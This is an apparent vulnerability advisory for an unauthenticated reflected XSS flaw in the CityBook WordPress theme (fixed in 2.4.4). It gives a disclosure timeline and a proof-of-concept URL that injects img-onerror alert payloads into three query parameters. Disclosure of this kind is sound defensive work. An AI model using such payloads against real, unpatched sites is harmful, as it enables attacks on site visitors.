CityBook < 2.4.4 - Unauthenticated Reflected XSS

2020-06-19T00:00:00
ID WPEX-ID:E814B9F4-21FF-4586-AE57-022F74D6F133
Type wpexploit
Reporter VLΛD VΞCTOR
Modified 2020-06-20T05:00:25

Description

Unauthenticated Reflected XSS vulnerability was discovered in the «CityBook - Directory & Listing WordPress Theme», tested version — v2.4.3. Edit (WPScanTeam) June 17th, 2020 - Confirmed & Escalated to Envato June 18th, 2020 - v2.4.4 released, fixing the issue

                                        
                                            https://example.com/?search_term=&distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS2`)%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS3`)%3E&lcats[]=47